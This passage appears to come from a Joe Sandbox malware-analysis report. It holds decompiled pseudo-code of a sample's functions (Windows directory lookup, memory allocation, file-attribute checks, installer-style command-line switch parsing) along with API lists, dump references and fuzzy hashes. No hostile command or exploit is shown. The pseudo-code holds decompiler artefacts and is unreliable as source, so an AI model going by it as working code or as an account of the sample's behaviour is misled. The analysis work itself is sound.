                                                                                                                                                                                                      					_t9 = E000E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000E623F
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: 1a53c98101ec32b07208cb908feddeb192cf6aa630e762976682962f697e9fcb
                                                                                                                                                                                                      • Instruction ID: 33213194731c3ce1d02931e7c3e4c861c36079e16c0b4be2c03519d114f16d6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a53c98101ec32b07208cb908feddeb192cf6aa630e762976682962f697e9fcb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23F0B4B0700248AFE750EB759D42BFE36A8DB94740F40046AAA85FB193DD759D448650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0xe8d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xe8d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0xe8d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe8d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,000E4FA1,00000000), ref: 000E4B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 026d5908cf8f7b13ec767de91e09d8fbf1b813935bd7bfb6b37a5981f41d6272
                                                                                                                                                                                                      • Instruction ID: ace4cd001c31c5243852d35efda179ca1595b056123bdd974cee844737777b9a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 026d5908cf8f7b13ec767de91e09d8fbf1b813935bd7bfb6b37a5981f41d6272
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64F01231508B889E4771CF3ECC00692BBE4BBD53603108A2F956EF2190EB31A451EB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E66AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,000E4777,?,000E4E38,?), ref: 000E66B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x000e4caa
                                                                                                                                                                                                      0x000e4cb1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 000E4CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x000e4cc8
                                                                                                                                                                                                      0x000e4ccf

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E000E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E000E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E000E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E000E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E000E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0xe9124 = E000E6285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E000E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E000E44B9(0, 0x521, 0xe1140, 0, 0x40, 0);
												_t85 =  *0xe8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E000E667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E000E667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E000E5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E000E1680(0xe8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E000E667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E000E667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xe8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E000E5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xe8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xe8a3a;
																}
																E000E1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E000E658A(_t218, 0x104, 0xe1140);
																if(E000E31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xe8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xe8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xe8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xe8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																L76:
                                                                                                                                                                                                      																_push(2);
                                                                                                                                                                                                      																_pop(1);
                                                                                                                                                                                                      																L83:
                                                                                                                                                                                                      																 *0xe8a38 = 1;
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t132 = _t127 - 1;
                                                                                                                                                                                                      															if(_t132 == 0) {
                                                                                                                                                                                                      																if(_v266 != 0) {
                                                                                                                                                                                                      																	if(_v266 != 0x3a) {
                                                                                                                                                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                      																			goto L49;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t201 = _v265;
                                                                                                                                                                                                      																		 *0xe9a2c = 1;
                                                                                                                                                                                                      																		if(_t201 != 0) {
                                                                                                                                                                                                      																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0xe9a2c =  *0xe9a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0xe8d48 =  *0xe8d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0xe9a2c =  *0xe9a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0xe9a2c =  *0xe9a2c & 0xfffffffe;
                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0xe8d48 =  *0xe8d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0xe9a2c =  *0xe9a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0xe8a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0xe9a2c = 3;
                                                                                                                                                                                                      																	 *0xe8a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0xe8a2c != 0 &&  *0xe8b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xe9a3c, 0xe8b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E000E66C8(0xe8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x000e5d17
                                                                                                                                                                                                      0x000e5d49
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d19
                                                                                                                                                                                                      0x000e5d19
                                                                                                                                                                                                      0x000e5d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d3f
                                                                                                                                                                                                      0x000e5d3f
                                                                                                                                                                                                      0x000e5d4b
                                                                                                                                                                                                      0x000e5d4b
                                                                                                                                                                                                      0x000e5d4f
                                                                                                                                                                                                      0x000e5d8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d93
                                                                                                                                                                                                      0x000e5d93
                                                                                                                                                                                                      0x000e5d9a
                                                                                                                                                                                                      0x000e5d9d
                                                                                                                                                                                                      0x000e5d9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d9e
                                                                                                                                                                                                      0x000e5d51
                                                                                                                                                                                                      0x000e5d5b
                                                                                                                                                                                                      0x000e5d72
                                                                                                                                                                                                      0x000e60fb
                                                                                                                                                                                                      0x000e60fb
                                                                                                                                                                                                      0x000e6207
